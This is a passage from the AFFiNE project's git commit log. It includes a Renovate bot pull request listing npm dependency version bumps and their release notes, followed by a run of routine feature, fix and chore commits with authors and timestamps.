| [react-i18next](https://redirect.github.com/i18next/react-i18next ) | [`15.0.1` -> `15.0.2`](https://renovatebot.com/diffs/npm/react-i18next/15.0.1/15.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [react-resizable-panels](https://redirect.github.com/bvaughn/react-resizable-panels ) | [`2.1.2` -> `2.1.3`](https://renovatebot.com/diffs/npm/react-resizable-panels/2.1.2/2.1.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [shadcn-ui](https://redirect.github.com/shadcn/ui ) ([source](https://redirect.github.com/shadcn/ui/tree/HEAD/packages/cli )) | [`0.9.0` -> `0.9.1`](https://renovatebot.com/diffs/npm/shadcn-ui/0.9.0/0.9.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [sinon](https://sinonjs.org/ ) ([source](https://redirect.github.com/sinonjs/sinon )) | [`19.0.0` -> `19.0.2`](https://renovatebot.com/diffs/npm/sinon/19.0.0/19.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [storybook](https://redirect.github.com/storybookjs/storybook/tree/next/code/lib/cli ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/lib/cli )) | [`8.3.0` -> `8.3.1`](https://renovatebot.com/diffs/npm/storybook/8.3.0/8.3.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [stripe](https://redirect.github.com/stripe/stripe-node ) | [`16.11.0` -> `16.12.0`](https://renovatebot.com/diffs/npm/stripe/16.11.0/16.12.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [tailwindcss](https://tailwindcss.com ) ([source](https://redirect.github.com/tailwindlabs/tailwindcss )) | [`3.4.11` -> `3.4.12`](https://renovatebot.com/diffs/npm/tailwindcss/3.4.11/3.4.12 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [vaul](https://vaul.emilkowal.ski/ ) ([source](https://redirect.github.com/emilkowalski/vaul )) | [`0.9.2` -> `0.9.4`](https://renovatebot.com/diffs/npm/vaul/0.9.2/0.9.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [vitest](https://redirect.github.com/vitest-dev/vitest ) ([source](https://redirect.github.com/vitest-dev/vitest/tree/HEAD/packages/vitest )) | [`2.1.0` -> `2.1.1`](https://renovatebot.com/diffs/npm/vitest/2.1.0/2.1.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [wrangler](https://redirect.github.com/cloudflare/workers-sdk ) ([source](https://redirect.github.com/cloudflare/workers-sdk/tree/HEAD/packages/wrangler )) | [`3.77.0` -> `3.78.5`](https://renovatebot.com/diffs/npm/wrangler/3.77.0/3.78.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [yarn](https://redirect.github.com/yarnpkg/berry ) ([source](https://redirect.github.com/yarnpkg/berry/tree/HEAD/packages/yarnpkg-cli )) | [`4.4.1` -> `4.5.0`](https://renovatebot.com/diffs/npm/yarn/4.4.1/4.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | packageManager | minor |
---
### Release Notes
<details>
<summary>atlassian/pragmatic-drag-and-drop (@​atlaskit/pragmatic-drag-and-drop)</summary>
### [`v1.3.1`](9d8fe0d7d4...4af587640f )
[Compare Source](9d8fe0d7d4...4af587640f )
</details>
<details>
<summary>aws/aws-sdk-js-v3 (@​aws-sdk/client-s3)</summary>
### [`v3.654.0`](https://redirect.github.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36540-2024-09-18 )
[Compare Source](https://redirect.github.com/aws/aws-sdk-js-v3/compare/v3.651.1...v3.654.0 )
##### Features
- **client-s3:** Added SSE-KMS support for directory buckets. ([a00b8b0](a00b8b018f ))
#### [3.651.1](https://redirect.github.com/aws/aws-sdk-js-v3/compare/v3.651.0...v3.651.1 ) (2024-09-13)
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://redirect.github.com/aws-sdk/client-s3 )
### [`v3.651.1`](https://redirect.github.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36511-2024-09-13 )
[Compare Source](https://redirect.github.com/aws/aws-sdk-js-v3/compare/v3.651.0...v3.651.1 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://redirect.github.com/aws-sdk/client-s3 )
</details>
<details>
<summary>faker-js/faker (@​faker-js/faker)</summary>
### [`v9.0.1`](https://redirect.github.com/faker-js/faker/blob/HEAD/CHANGELOG.md#901-2024-09-14 )
[Compare Source](https://redirect.github.com/faker-js/faker/compare/v9.0.0...v9.0.1 )
##### Bug Fixes
- emit cts types ([#​3093](https://redirect.github.com/faker-js/faker/issues/3093 )) ([53ef42c](53ef42cc19 ))
</details>
<details>
<summary>floating-ui/floating-ui (@​floating-ui/dom)</summary>
### [`v1.6.11`](https://redirect.github.com/floating-ui/floating-ui/blob/HEAD/packages/dom/CHANGELOG.md#1611 )
[Compare Source](https://redirect.github.com/floating-ui/floating-ui/compare/@floating-ui/dom@1.6.10...@floating-ui/dom@1.6.11 )
##### Patch Changes
- fix: handle html relative offset
- Update dependencies: `@floating-ui/utils@0.2.8`
</details>
<details>
<summary>microsoft/playwright (@​playwright/test)</summary>
### [`v1.47.1`](https://redirect.github.com/microsoft/playwright/compare/v1.47.0...3d2ffd0fe97f23f480092054da5928539a3c5beb )
[Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.47.0...v1.47.1 )
</details>
<details>
<summary>slackapi/node-slack-sdk (@​slack/web-api)</summary>
### [`v7.5.0`](https://redirect.github.com/slackapi/node-slack-sdk/compare/@slack/web-api@7.4.0...453ef16d29ea1e983c66f4a2d3ee8a4f920f3c27 )
[Compare Source](https://redirect.github.com/slackapi/node-slack-sdk/compare/@slack/web-api@7.4.0...@slack/web-api@7.5.0 )
</details>
<details>
<summary>storybookjs/storybook (@​storybook/addon-essentials)</summary>
### [`v8.3.1`](https://redirect.github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#831 )
[Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v8.3.0...v8.3.1 )
- Angular: Fix sourceDecorator to apply excludeDecorators flag - [#​29069](https://redirect.github.com/storybookjs/storybook/pull/29069 ), thanks [@​JSMike](https://redirect.github.com/JSMike )!
- Core: Do not prebundle better-opn - [#​29137](https://redirect.github.com/storybookjs/storybook/pull/29137 ), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic )!
- Core: Do not prebundle jsdoc-type-pratt-parser - [#​29134](https://redirect.github.com/storybookjs/storybook/pull/29134 ), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic )!
- Next.js: Upgrade sass-loader from ^12 to ^13 - [#​29040](https://redirect.github.com/storybookjs/storybook/pull/29040 ), thanks [@​HoncharenkoZhenya](https://redirect.github.com/HoncharenkoZhenya )!
</details>
<details>
<summary>vitest-dev/vitest (@​vitest/coverage-istanbul)</summary>
### [`v2.1.1`](https://redirect.github.com/vitest-dev/vitest/releases/tag/v2.1.1 )
[Compare Source](https://redirect.github.com/vitest-dev/vitest/compare/v2.1.0...v2.1.1 )
##### 🐞 Bug Fixes
- **browser**:
- Make example test callbacks async - by [@​aqandrew](https://redirect.github.com/aqandrew ) in [https://github.com/vitest-dev/vitest/issues/6484 ](https://redirect.github.com/vitest-dev/vitest/issues/6484 ) [<samp>(16aa7)</samp>](https://redirect.github.com/vitest-dev/vitest/commit/16aa76c2 )
- Optimize vitest-browser-vue correctly - by [@​sheremet-va](https://redirect.github.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6490 ](https://redirect.github.com/vitest-dev/vitest/issues/6490 ) [<samp>(5cbb0)</samp>](https://redirect.github.com/vitest-dev/vitest/commit/5cbb0bba )
- **workspace**:
- Resolve glob pattern once to avoid name collision - by [@​sheremet-va](https://redirect.github.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6489 ](https://redirect.github.com/vitest-dev/vitest/issues/6489 ) [<samp>(36b5a)</samp>](https://redirect.github.com/vitest-dev/vitest/commit/36b5aceb )
##### [View changes on GitHub](https://redirect.github.com/vitest-dev/vitest/compare/v2.1.0...v2.1.1 )
</details>
<details>
<summary>dtolnay/anyhow (anyhow)</summary>
### [`v1.0.89`](https://redirect.github.com/dtolnay/anyhow/releases/tag/1.0.89 )
[Compare Source](https://redirect.github.com/dtolnay/anyhow/compare/1.0.88...1.0.89 )
- Make anyhow::Error's `UnwindSafe` and `RefUnwindSafe` impl consistently available between versions of Rust newer and older than 1.72 ([#​386](https://redirect.github.com/dtolnay/anyhow/issues/386 ))
</details>
<details>
<summary>electron-userland/electron-builder (builder-util-runtime)</summary>
### [`v9.2.8`](https://redirect.github.com/electron-userland/electron-builder/blob/HEAD/packages/builder-util-runtime/CHANGELOG.md#928 )
##### Patch Changes
- [#​8491](https://redirect.github.com/electron-userland/electron-builder/pull/8491 ) [`178a3c40`](178a3c40f3 ) Thanks [@​mmaietta](https://redirect.github.com/mmaietta )! - chore: migrating to typedoc and updating/improving type+interface definitions
### [`v9.2.7`](https://redirect.github.com/electron-userland/electron-builder/blob/HEAD/packages/builder-util-runtime/CHANGELOG.md#927 )
##### Patch Changes
- [#​8486](https://redirect.github.com/electron-userland/electron-builder/pull/8486 ) [`d56cd274`](d56cd274b9 ) Thanks [@​mmaietta](https://redirect.github.com/mmaietta )! - fix(deploy): redeploy all packages to sync semver ranges
</details>
<details>
<summary>electron/electron (electron)</summary>
### [`v32.1.1`](https://redirect.github.com/electron/electron/releases/tag/v32.1.1 ): electron v32.1.1
[Compare Source](https://redirect.github.com/electron/electron/compare/v32.1.0...v32.1.1 )
### Release Notes for v32.1.1
#### Fixes
- Fixed an issue when dragging to resize when using Window Controls Overlay on Linux. [#​43743](https://redirect.github.com/electron/electron/pull/43743 ) <span style="font-size:small;">(Also in [33](https://redirect.github.com/electron/electron/pull/43744 ))</span>
- Fixed an issue where `WebContentsView`s did not show correctly in some circumstances on macOS after being added as child views. [#​43698](https://redirect.github.com/electron/electron/pull/43698 ) <span style="font-size:small;">(Also in [31](https://redirect.github.com/electron/electron/pull/43697 ), [33](https://redirect.github.com/electron/electron/pull/43696 ))</span>
#### Other Changes
- Updated Chromium to 128.0.6613.137. [#​43683](https://redirect.github.com/electron/electron/pull/43683 )
</details>
<details>
<summary>electron-userland/electron-builder (electron-updater)</summary>
### [`v6.3.7`](https://redirect.github.com/electron-userland/electron-builder/blob/HEAD/packages/electron-updater/CHANGELOG.md#637 )
[Compare Source](https://redirect.github.com/electron-userland/electron-builder/compare/electron-updater@6.3.6...electron-updater@6.3.7 )
##### Patch Changes
- [#​8491](https://redirect.github.com/electron-userland/electron-builder/pull/8491 ) [`178a3c40`](178a3c40f3 ) Thanks [@​mmaietta](https://redirect.github.com/mmaietta )! - chore: migrating to typedoc and updating/improving type+interface definitions
- Updated dependencies \[[`178a3c40`](178a3c40f3 )]:
- builder-util-runtime@9.2.8
### [`v6.3.6`](https://redirect.github.com/electron-userland/electron-builder/blob/HEAD/packages/electron-updater/CHANGELOG.md#636 )
[Compare Source](https://redirect.github.com/electron-userland/electron-builder/compare/electron-updater@6.3.5...electron-updater@6.3.6 )
##### Patch Changes
- [#​8486](https://redirect.github.com/electron-userland/electron-builder/pull/8486 ) [`d56cd274`](d56cd274b9 ) Thanks [@​mmaietta](https://redirect.github.com/mmaietta )! - fix(deploy): redeploy all packages to sync semver ranges
- Updated dependencies \[[`d56cd274`](d56cd274b9 )]:
- builder-util-runtime@9.2.7
</details>
<details>
<summary>davidjerleke/embla-carousel (embla-carousel-react)</summary>
### [`v8.3.0`](https://redirect.github.com/davidjerleke/embla-carousel/releases/tag/v8.3.0 )
[Compare Source](https://redirect.github.com/davidjerleke/embla-carousel/compare/v8.2.1...v8.3.0 )
Embla Carousel is an open source MIT licensed project. If you are interested in **supporting this project** you can sponsor it here:
- [**`💖 Sponsor`**](https://redirect.github.com/sponsors/davidjerleke )
#### What's Changed
- \[Feat]: Upgrade deprecated Node version for GitHub actions by [@​davidjerleke](https://redirect.github.com/davidjerleke ) in [https://github.com/davidjerleke/embla-carousel/pull/999 ](https://redirect.github.com/davidjerleke/embla-carousel/pull/999 )
- \[Feat]: Adding updated `onemblaInit` naming for Svelte 5 by [@​S1r-Lanzelot](https://redirect.github.com/S1r-Lanzelot ) in [#​992](https://redirect.github.com/davidjerleke/embla-carousel/issues/992 )
**Full Changelog**: https://github.com/davidjerleke/embla-carousel/compare/v8.2.1...v8.3.0
</details>
<details>
<summary>mswjs/msw (msw)</summary>
### [`v2.4.8`](https://redirect.github.com/mswjs/msw/releases/tag/v2.4.8 )
[Compare Source](https://redirect.github.com/mswjs/msw/compare/v2.4.7...v2.4.8 )
#### v2.4.8 (2024-09-17)
##### Bug Fixes
- address `express` and `path-to-regexp` vulnerabilities ([#​2285](https://redirect.github.com/mswjs/msw/issues/2285 )) ([`e3487bc`](e3487bc425 )) [@​markmssd](https://redirect.github.com/markmssd )
### [`v2.4.7`](https://redirect.github.com/mswjs/msw/releases/tag/v2.4.7 )
[Compare Source](https://redirect.github.com/mswjs/msw/compare/v2.4.6...v2.4.7 )
#### v2.4.7 (2024-09-15)
##### Bug Fixes
- **ClientRequest:** prevent duplicates when recording set headers ([#​2284](https://redirect.github.com/mswjs/msw/issues/2284 )) ([`e04eb8f`](e04eb8f44f )) [@​kettanaito](https://redirect.github.com/kettanaito )
- use `Object.defineProperty` for Headers proxy ([#​2283](https://redirect.github.com/mswjs/msw/issues/2283 )) ([`94e17be`](94e17beea4 )) [@​kettanaito](https://redirect.github.com/kettanaito )
### [`v2.4.6`](https://redirect.github.com/mswjs/msw/releases/tag/v2.4.6 )
[Compare Source](https://redirect.github.com/mswjs/msw/compare/v2.4.5...v2.4.6 )
#### v2.4.6 (2024-09-13)
##### Bug Fixes
- **xhr:** clone request body before calculating its size ([#​2282](https://redirect.github.com/mswjs/msw/issues/2282 )) ([`397444b`](397444bcc3 )) [@​kettanaito](https://redirect.github.com/kettanaito )
</details>
<details>
<summary>remy/nodemon (nodemon)</summary>
### [`v3.1.5`](https://redirect.github.com/remy/nodemon/compare/v3.1.4...254c2ab17877a79b9573c79371cb0fc567eb0514 )
[Compare Source](https://redirect.github.com/remy/nodemon/compare/v3.1.4...v3.1.5 )
</details>
<details>
<summary>nrwl/nx (nx)</summary>
### [`v19.7.4`](https://redirect.github.com/nrwl/nx/releases/tag/19.7.4 )
[Compare Source](https://redirect.github.com/nrwl/nx/compare/19.7.3...19.7.4 )
#### 19.7.4 (2024-09-18)
##### 🚀 Features
- **core:** able to import gradle project ([#​27645](https://redirect.github.com/nrwl/nx/pull/27645 ))
- **release:** support groupPreVersionCommand for release groups ([#​27474](https://redirect.github.com/nrwl/nx/pull/27474 ))
##### 🩹 Fixes
- **angular:** add serve static target more intentionally [#​27854](https://redirect.github.com/nrwl/nx/issues/27854 ) ([#​27924](https://redirect.github.com/nrwl/nx/pull/27924 ), [#​27854](https://redirect.github.com/nrwl/nx/issues/27854 ))
- **angular:** dynamic module federation should not reset remoteUrlDefinitions [#​27793](https://redirect.github.com/nrwl/nx/issues/27793 ) ([#​27927](https://redirect.github.com/nrwl/nx/pull/27927 ), [#​27793](https://redirect.github.com/nrwl/nx/issues/27793 ))
- **angular:** migrations should use correct namedInputs [#​27899](https://redirect.github.com/nrwl/nx/issues/27899 ) ([#​27929](https://redirect.github.com/nrwl/nx/pull/27929 ), [#​27899](https://redirect.github.com/nrwl/nx/issues/27899 ))
- **core:** add flag to disable the db and logs when there are errors … ([#​27930](https://redirect.github.com/nrwl/nx/pull/27930 ))
- **core:** import should be rebasable ([#​27940](https://redirect.github.com/nrwl/nx/pull/27940 ))
- **core:** import handles argument escaping correctly in Windows ([#​27957](https://redirect.github.com/nrwl/nx/pull/27957 ))
- **core:** fix env for running parallel tasks ([#​27889](https://redirect.github.com/nrwl/nx/pull/27889 ))
- **core:** nx import detects plugins synchronously ([#​27958](https://redirect.github.com/nrwl/nx/pull/27958 ))
- **js:** set compilerOptions correctly when loading .ts that targets ESM ([#​27862](https://redirect.github.com/nrwl/nx/pull/27862 ))
- **js:** do not infer typecheck target for root tsconfig.json ([#​27950](https://redirect.github.com/nrwl/nx/pull/27950 ))
- **nx-dev:** update contributors value ([#​27944](https://redirect.github.com/nrwl/nx/pull/27944 ))
- **react:** Add historyApiFallback to webpack config ([#​27942](https://redirect.github.com/nrwl/nx/pull/27942 ))
- **release:** ensure default release group has projects on windows ([#​27933](https://redirect.github.com/nrwl/nx/pull/27933 ))
- **release:** allow string array for commitArgs and tagArgs ([#​27797](https://redirect.github.com/nrwl/nx/pull/27797 ))
- **remix:** vite plugin should be less strict on inference [#​27884](https://redirect.github.com/nrwl/nx/issues/27884 ) ([#​27923](https://redirect.github.com/nrwl/nx/pull/27923 ), [#​27884](https://redirect.github.com/nrwl/nx/issues/27884 ))
- **storybook:** do not duplicate cacheable operations [#​27866](https://redirect.github.com/nrwl/nx/issues/27866 ) ([#​27951](https://redirect.github.com/nrwl/nx/pull/27951 ), [#​27866](https://redirect.github.com/nrwl/nx/issues/27866 ))
- **vite:** typecheck infer plugin should use correct inputs ([#​27922](https://redirect.github.com/nrwl/nx/pull/27922 ))
- **vite:** exit from test if no files found ([#​27722](https://redirect.github.com/nrwl/nx/pull/27722 ))
##### ❤️ Thank You
- Ali Yusuf [@​AliYusuf95](https://redirect.github.com/AliYusuf95 )
- Austin Fahsl [@​fahslaj](https://redirect.github.com/fahslaj )
- Benjamin Cabanes [@​bcabanes](https://redirect.github.com/bcabanes )
- Colum Ferry [@​Coly010](https://redirect.github.com/Coly010 )
- Craigory Coppola [@​AgentEnder](https://redirect.github.com/AgentEnder )
- Emily Xiong [@​xiongemi](https://redirect.github.com/xiongemi )
- Jack Hsu [@​jaysoo](https://redirect.github.com/jaysoo )
- Jason Jean [@​FrozenPandaz](https://redirect.github.com/FrozenPandaz )
- Jonathan Gelin [@​jogelin](https://redirect.github.com/jogelin )
- Leosvel Pérez Espinosa [@​leosvelperez](https://redirect.github.com/leosvelperez )
- Nicholas Cunningham [@​ndcunningham](https://redirect.github.com/ndcunningham )
</details>
<details>
<summary>openai/openai-node (openai)</summary>
### [`v4.62.1`](https://redirect.github.com/openai/openai-node/blob/HEAD/CHANGELOG.md#4621-2024-09-18 )
[Compare Source](https://redirect.github.com/openai/openai-node/compare/v4.62.0...v4.62.1 )
Full Changelog: [v4.62.0...v4.62.1](https://redirect.github.com/openai/openai-node/compare/v4.62.0...v4.62.1 )
##### Bug Fixes
- **types:** remove leftover polyfill usage ([#​1084](https://redirect.github.com/openai/openai-node/issues/1084 )) ([b7c9538](b7c9538981 ))
### [`v4.62.0`](https://redirect.github.com/openai/openai-node/blob/HEAD/CHANGELOG.md#4620-2024-09-17 )
[Compare Source](https://redirect.github.com/openai/openai-node/compare/v4.61.1...v4.62.0 )
Full Changelog: [v4.61.1...v4.62.0](https://redirect.github.com/openai/openai-node/compare/v4.61.1...v4.62.0 )
##### Features
- **client:** add .\_request_id property to object responses ([#​1078](https://redirect.github.com/openai/openai-node/issues/1078 )) ([d5c2131](d5c2131444 ))
##### Chores
- **internal:** add ecosystem test for qs reproduction ([0199dd8](0199dd8598 ))
- **internal:** add query string encoder ([#​1079](https://redirect.github.com/openai/openai-node/issues/1079 )) ([f870682](f870682d5c ))
- **internal:** fix some types ([#​1082](https://redirect.github.com/openai/openai-node/issues/1082 )) ([1ec41a7](1ec41a7d76 ))
- **tests:** add query string tests to ecosystem tests ([36be724](36be724384 ))
### [`v4.61.1`](https://redirect.github.com/openai/openai-node/blob/HEAD/CHANGELOG.md#4611-2024-09-16 )
[Compare Source](https://redirect.github.com/openai/openai-node/compare/v4.61.0...v4.61.1 )
Full Changelog: [v4.61.0...v4.61.1](https://redirect.github.com/openai/openai-node/compare/v4.61.0...v4.61.1 )
##### Bug Fixes
- **runTools:** correct request options type ([#​1073](https://redirect.github.com/openai/openai-node/issues/1073 )) ([399f971](399f9710f9 ))
##### Chores
- **internal:** update spec link ([#​1076](https://redirect.github.com/openai/openai-node/issues/1076 )) ([20f1bcc](20f1bcce2b ))
### [`v4.61.0`](https://redirect.github.com/openai/openai-node/blob/HEAD/CHANGELOG.md#4610-2024-09-13 )
[Compare Source](https://redirect.github.com/openai/openai-node/compare/v4.60.1...v4.61.0 )
Full Changelog: [v4.60.1...v4.61.0](https://redirect.github.com/openai/openai-node/compare/v4.60.1...v4.61.0 )
##### Bug Fixes
- **client:** partial parsing update to handle strings ([46e8eb6](46e8eb6a9a ))
- **examples:** handle usage chunk in tool call streaming ([#​1068](https://redirect.github.com/openai/openai-node/issues/1068 )) ([e4188c4](e4188c4ba4 ))
##### Chores
- **examples:** add a small delay to tool-calls example streaming ([a3fc659](a3fc65928a ))
##### Documentation
- update CONTRIBUTING.md ([#​1071](https://redirect.github.com/openai/openai-node/issues/1071 )) ([5de81c9](5de81c95d7 ))
### [`v4.60.1`](https://redirect.github.com/openai/openai-node/blob/HEAD/CHANGELOG.md#4601-2024-09-13 )
[Compare Source](https://redirect.github.com/openai/openai-node/compare/v4.60.0...v4.60.1 )
Full Changelog: [v4.60.0...v4.60.1](https://redirect.github.com/openai/openai-node/compare/v4.60.0...v4.60.1 )
##### Bug Fixes
- **zod:** correctly add $ref definitions for transformed schemas ([#​1065](https://redirect.github.com/openai/openai-node/issues/1065 )) ([9b93b24](9b93b24b8a ))
</details>
<details>
<summary>piscinajs/piscina (piscina)</summary>
### [`v4.7.0`](https://redirect.github.com/piscinajs/piscina/releases/tag/v4.7.0 )
[Compare Source](https://redirect.github.com/piscinajs/piscina/compare/v4.6.1...v4.7.0 )
#### What's Changed
- docs: add a new documentation page for Piscina by [@​bellatrick](https://redirect.github.com/bellatrick ) in [https://github.com/piscinajs/piscina/pull/591 ](https://redirect.github.com/piscinajs/piscina/pull/591 )
- docs: fix abortSignal parameter name which should be `signal` by [@​jasonchoimtt](https://redirect.github.com/jasonchoimtt ) in [https://github.com/piscinajs/piscina/pull/606 ](https://redirect.github.com/piscinajs/piscina/pull/606 )
- chore(deps-dev): Bump c8 from 9.1.0 to 10.1.2 by [@​dependabot](https://redirect.github.com/dependabot ) in [https://github.com/piscinajs/piscina/pull/594 ](https://redirect.github.com/piscinajs/piscina/pull/594 )
- chore(deps-dev): Bump [@​types/node](https://redirect.github.com/types/node ) from 20.14.2 to 20.14.10 by [@​dependabot](https://redirect.github.com/dependabot ) in [https://github.com/piscinajs/piscina/pull/607 ](https://redirect.github.com/piscinajs/piscina/pull/607 )
- docs: Added examples section in the documentation site by [@​bellatrick](https://redirect.github.com/bellatrick ) in [https://github.com/piscinajs/piscina/pull/614 ](https://redirect.github.com/piscinajs/piscina/pull/614 )
- chore: add automatization for docs by [@​metcoder95](https://redirect.github.com/metcoder95 ) in [https://github.com/piscinajs/piscina/pull/633 ](https://redirect.github.com/piscinajs/piscina/pull/633 )
-
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC43NC4xIiwidXBkYXRlZEluVmVyIjoiMzguODAuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-19 05:42:08 +00:00
EYHN
9a01da76e1
feat: sync i18n with crowdin ( #8293 )
2024-09-19 05:30:18 +00:00
fundon
6921c3073c
refactor(core): improve scroll anchoring logic ( #8269 )
...
Upstreams: https://github.com/toeverything/blocksuite/pull/8378
2024-09-19 02:58:11 +00:00
forehalo
03ac9bc4a1
chore(server): enable renderer for all deployment ( #8283 )
2024-09-19 02:34:57 +00:00
JimmFly
a1fe7c8ef6
chore: update i18n rescources ( #8301 )
2024-09-19 02:12:04 +00:00
JimmFly
ee3c05904d
refactor(core): adjust error detail and add error component to routes ( #8234 )
...
close PD-1430
https://github.com/user-attachments/assets/9447eaa5-c8b3-4108-96f1-d67ab45f249d

2024-09-19 02:12:03 +00:00
forehalo
ed7fb3fb71
fix(core): only sign out previous account in web oauth ( #8290 )
2024-09-19 02:00:00 +00:00
CatsJuice
ce2ce26395
chore(core): reduce unnecessary layers ( #8292 )
...

2024-09-19 01:48:32 +00:00
fundon
bba9e79e59
fix(core): override LinkedDocBlockComponent initial state ( #8253 )
...
Upstreams: https://github.com/toeverything/blocksuite/pull/8354
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/8ypiIKZXudF5a0tIgIzf/f8214c18-2fb7-4cbe-9d0d-5302f520b676.mov ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/8ypiIKZXudF5a0tIgIzf/f8214c18-2fb7-4cbe-9d0d-5302f520b676.mov ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/8ypiIKZXudF5a0tIgIzf/f8214c18-2fb7-4cbe-9d0d-5302f520b676.mov ">Screen Recording 2024-09-13 at 20.27.38.mov</video>
2024-09-19 01:37:18 +00:00
CatsJuice
f4a19921c4
feat(core): extract DocDisplayMetaService to resolve doc icon/title ( #8226 )
...
AF-1315
2024-09-19 01:25:02 +00:00
fundon
f397815ad1
chore: bump blocksuite ( #8230 )
...
## 0.17.11
### Patch Changes
- [3c61be5](3c61be5ded ): - Refactor drag handle widget
- Split embed blocks to `@blocksuite/affine-block-embed`
- Fix latex selected state in edgeless mode
- Fix unclear naming
- Fix prototype pollution
- Fix portal interaction in affine modal
- Fix paste linked block on edgeless
- Add scroll anchoring widget
- Add highlight selection
2024-09-18 12:11:14 +00:00
Saul-Mirone
b73d3b3d55
ci: adjust renovate config for bs ( #8298 )
2024-09-18 10:17:09 +00:00
pengx17
5ae433b009
fix(electron): shell skeleton style ( #8296 )
2024-09-18 09:54:14 +00:00
JimmFly
67577ee66e
chore: adjust modal background color for peek view ( #8295 )
...
close AF-1391
2024-09-18 09:19:17 +00:00
akumatus
a0d6a28ff4
fix: default style of new document does not follow AFFiNE settings ( #8291 )
...
Close issue [BS-1377](https://linear.app/affine-design/issue/BS-1377 ).
### What changed?
- Add `initDocFromProps` function to initialize the document with specific props.
- Extract `docProps` from editor settings and pass it to `docsService.createDoc` function.
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/sJGviKxfE3Ap685cl5bj/8082a8bd-ab3d-432c-9d3e-2f1d1a8398eb.mov ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/sJGviKxfE3Ap685cl5bj/8082a8bd-ab3d-432c-9d3e-2f1d1a8398eb.mov ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/sJGviKxfE3Ap685cl5bj/8082a8bd-ab3d-432c-9d3e-2f1d1a8398eb.mov ">录屏2024-09-18 16.13.43.mov</video>
2024-09-18 08:45:58 +00:00
JimmFly
544cdd3d56
fix(core): adjust app updater button style ( #8289 )
...
https://github.com/user-attachments/assets/6d6d9ff5-f3aa-466b-94f1-ce152b856cac
2024-09-18 08:19:57 +00:00
forehalo
366c3b8784
fix(electron): define in esbuild ( #8287 )
2024-09-18 08:07:58 +00:00
pengx17
917640c5b0
fix(electron): sentry is not enabled correctly in electron ( #8286 )
...
fix AF-1036
2024-09-18 08:07:58 +00:00
JimmFly
af5b9a3a23
